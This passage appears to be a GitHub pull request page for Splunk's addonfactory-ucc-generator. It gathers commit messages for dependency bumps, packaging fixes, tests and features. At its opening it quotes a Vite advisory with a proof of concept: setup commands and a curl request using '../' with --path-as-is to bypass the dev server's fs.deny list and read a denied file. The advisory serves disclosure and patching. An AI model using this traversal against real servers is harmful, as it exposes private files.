which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that). ### PoC Execute the following shell commands: ``` npm create vite@latest cd vite-project/ mkdir p cd p ln -s a b cd .. echo 'import path from "node:path"; import { defineConfig } from "vite"; export default defineConfig({publicDir: path.resolve(__dirname, "p/"), server: {fs: {deny: [path.resolve(__dirname, "private.txt")]}}})' > vite.config.js echo "secret" > private.txt npm install npm run dev ``` Then, in a different shell, run the following command: `curl -v --path-as-is 'http://localhost:5173/private.txt'` You will receive a 403 HTTP Response, because private.txt is denied. Now in the same shell run the following command: `curl -v --path-as-is 'http://localhost:5173/../private.txt'` You will receive the contents of private.txt. ### Related links - lukeed/sirv@f0113f3 --- ### Release Notes <details> <summary>vitejs/vite (vite)</summary> ### [`v7.1.5`](https://redirect.github.com/vitejs/vite/blob/HEAD/packages/vite/CHANGELOG.md#small-715-2025-09-08-small) [Compare Source](https://redirect.github.com/vitejs/vite/compare/v7.1.4...v7.1.5) ##### Bug Fixes - apply `fs.strict` check to HTML files ([#​20736](https://redirect.github.com/vitejs/vite/issues/20736)) ([14015d7](https://redirect.github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e)) - **deps:** update all non-major dependencies ([#​20732](https://redirect.github.com/vitejs/vite/issues/20732)) ([122bfba](https://redirect.github.com/vitejs/vite/commit/122bfbabeb1f095ce7cabd30893e5531e9a007c4)) - upgrade sirv to 3.0.2 ([#​20735](https://redirect.github.com/vitejs/vite/issues/20735)) ([09f2b52](https://redirect.github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d)) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/splunk/addonfactory-ucc-generator). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjEzMC4xIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6W119--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs from Renovate will soon appear from 'Mend'. Learn more [here](https://redirect.github.com/renovatebot/renovate/discussions/37842). This PR contains the following updates: | Package | Change | Age | Confidence | |---|---|---|---| | [addonfactory-splunk-conf-parser-lib](https://redirect.github.com/splunk/addonfactory-splunk-conf-parser-lib) | `^0.4.3` -> `^1.0.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | | [splunk-appinspect](https://dev.splunk.com/goto/appinspectdownload) | `^3.10.3` -> `^4.0.0` | [](https://docs.renovatebot.com/merge-confidence/) | [](https://docs.renovatebot.com/merge-confidence/) | --- ### Release Notes <details> <summary>splunk/addonfactory-splunk-conf-parser-lib (addonfactory-splunk-conf-parser-lib)</summary> ### [`v1.0.0`](https://redirect.github.com/splunk/addonfactory-splunk-conf-parser-lib/releases/tag/v1.0.0) [Compare Source](https://redirect.github.com/splunk/addonfactory-splunk-conf-parser-lib/compare/v0.4.3...v1.0.0) ##### Features - support for Python 3.9+ ([#​113](https://redirect.github.com/splunk/addonfactory-splunk-conf-parser-lib/issues/113)) ([59afb0d](https://redirect.github.com/splunk/addonfactory-splunk-conf-parser-lib/commit/59afb0d8651a0f4ecb705155a44ec1e2c1ad819b)) ##### BREAKING CHANGES - support for Python 3.9+ </details> --- ### Configuration 📅 **Schedule**: Branch creation - "every 2 weeks on Sunday" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/splunk/addonfactory-ucc-generator). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4yMy4yIiwidXBkYXRlZEluVmVyIjoiNDEuMTMxLjkiLCJ0YXJnZXRCcmFuY2giOiJkZXZlbG9wIiwibGFiZWxzIjpbXX0=--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
**Issue number:** ADDON-83800 ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [x] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Poetry changed the format of `pyproject.toml`, related to included files. Our existing configuration resulted in inclusion of files only in the `sdist` package, not in the `wheel`. This resulted in no UI files in the UCC wheel package. ### User experience It makes UCC usable. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [x] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
kkedziak-splunk
requested review from
hetangmodi-crest,
rohanm-crest,
sgoral-splunk and
soleksy-splunk
Contributor
Author
|
UI files will work again in this release: |
**Issue number:** ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Please provide a summary of the changes. ### User experience Please describe the user experience before and after this change. Screenshots are welcome for additional context. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [ ] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [ ] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** - ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Added a smoke test to verify the UI files to be present in the .whl file of UCC. ### User experience No change, just adding a smoke test to verify all the UI files that should be present. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [x] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [x] Refactoring (no functional or API changes) * [ ] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Updated `alert_action_py.template` file as it was quite monolithic and was outdated. ### User experience We wouldn't be raising specific exceptions in generated alert_action template file. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [x] Unit - tests have been added/modified to cover the changes * [x] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [x] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** ADDON-83915 ### PR Type **What kind of change does this PR introduce?** * [x] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [x] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Introduced a new argument inside meta `supportedPythonVersion`that would generate `python.required` in .conf and spec files while building the add-on as python.version would get deprecated in newer releases of Splunk. ### User experience For Users who would use newer version of Splunk would not have to add `python.required` in their .conf files manually, UCC would generate it for them if `supportedPythonVersion` is being defined in meta in globalConfig. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [ ] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [ ] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [x] Unit - tests have been added/modified to cover the changes * [x] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [x] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** [ADDON-81027](https://splunk.atlassian.net/browse/ADDON-81027) ### PR Type **What kind of change does this PR introduce?** * [x] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [ ] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes TA will now show custom favicon if it is set. If it is not, then the default is shown. ### User experience Users will see custom favicon if it is set. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [x] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear* Co-authored-by: soleksy-splunk <[email protected]> Co-authored-by: Hetang Modi <[email protected]>
**Issue number:** - ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Updated the vite version to v7.1.5 as mentioned by Fossa failure. Cleaned up dependencies in yarn.lock using `yarn-deduplicate` tool. Also, explicitly using node version 22.21.0 ### User experience No change, just the vite dependency has been updated. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
This PR contains the following updates: | Package | Type | Update | Change | |---|---|---|---| | [actions/download-artifact](https://redirect.github.com/actions/download-artifact) | action | major | `v5` -> `v6` | | [actions/setup-node](https://redirect.github.com/actions/setup-node) | action | major | `v5` -> `v6` | | [actions/upload-artifact](https://redirect.github.com/actions/upload-artifact) | action | major | `v4` -> `v5` | --- ### Release Notes <details> <summary>actions/download-artifact (actions/download-artifact)</summary> ### [`v6`](https://redirect.github.com/actions/download-artifact/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/download-artifact/compare/v5...v6) </details> <details> <summary>actions/setup-node (actions/setup-node)</summary> ### [`v6`](https://redirect.github.com/actions/setup-node/compare/v5...v6) [Compare Source](https://redirect.github.com/actions/setup-node/compare/v5...v6) </details> <details> <summary>actions/upload-artifact (actions/upload-artifact)</summary> ### [`v5`](https://redirect.github.com/actions/upload-artifact/compare/v4...v5) [Compare Source](https://redirect.github.com/actions/upload-artifact/compare/v4...v5) </details> --- ### Configuration 📅 **Schedule**: Branch creation - "every 2 weeks on Sunday" (UTC), Automerge - At any time (no schedule defined). 🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied. ♻ **Rebasing**: Whenever PR is behind base branch, or you tick the rebase/retry checkbox. 👻 **Immortal**: This PR will be recreated if closed unmerged. Get [config help](https://redirect.github.com/renovatebot/renovate/discussions) if that's undesired. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR was generated by [Mend Renovate](https://mend.io/renovate/). View the [repository job log](https://developer.mend.io/github/splunk/addonfactory-ucc-generator). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS4xNTYuMSIsInVwZGF0ZWRJblZlciI6IjQxLjE1Ni4xIiwidGFyZ2V0QnJhbmNoIjoiZGV2ZWxvcCIsImxhYmVscyI6W119--> Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
**Issue number:** N/A ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Include Python 3.14. ### User experience "Officially" tested using Python 3.14 as well. ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [ ] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** N/A ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes `poetry lock`. ### User experience N/A ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [ ] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear*
**Issue number:** N/A ### PR Type **What kind of change does this PR introduce?** * [ ] Feature * [ ] Bug Fix * [ ] Refactoring (no functional or API changes) * [ ] Documentation Update * [x] Maintenance (dependency updates, CI, etc.) ## Summary ### Changes Update versions for GH Actions and use `ubuntu-latest` as we moved to Python 3.9+. ### User experience N/A ## Checklist If an item doesn't apply to your changes, leave it unchecked. ### Review * [x] self-review - I have performed a self-review of this change according to the [development guidelines](https://splunk.github.io/addonfactory-ucc-generator/contributing/#development-guidelines) * [ ] Changes are documented. The documentation is understandable, examples work [(more info)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#documentation-guidelines) * [x] PR title and description follows the [contributing principles](https://splunk.github.io/addonfactory-ucc-generator/contributing/#pull-requests) * [ ] meeting - I have scheduled a meeting or recorded a demo to explain these changes (if there is a video, put a link below and in the ticket) ### Tests See [the testing doc](https://splunk.github.io/addonfactory-ucc-generator/contributing/#build-and-test). * [ ] Unit - tests have been added/modified to cover the changes * [ ] Smoke - tests have been added/modified to cover the changes * [ ] UI - tests have been added/modified to cover the changes * [ ] coverage - I have checked the code coverage of my changes [(see more)](https://splunk.github.io/addonfactory-ucc-generator/contributing/#checking-the-code-coverage) **Demo/meeting:** *Reviewers are encouraged to request meetings or demos if any part of the change is unclear* --------- Co-authored-by: srv-rr-github-token <[email protected]>
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
4 participants
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
No description provided.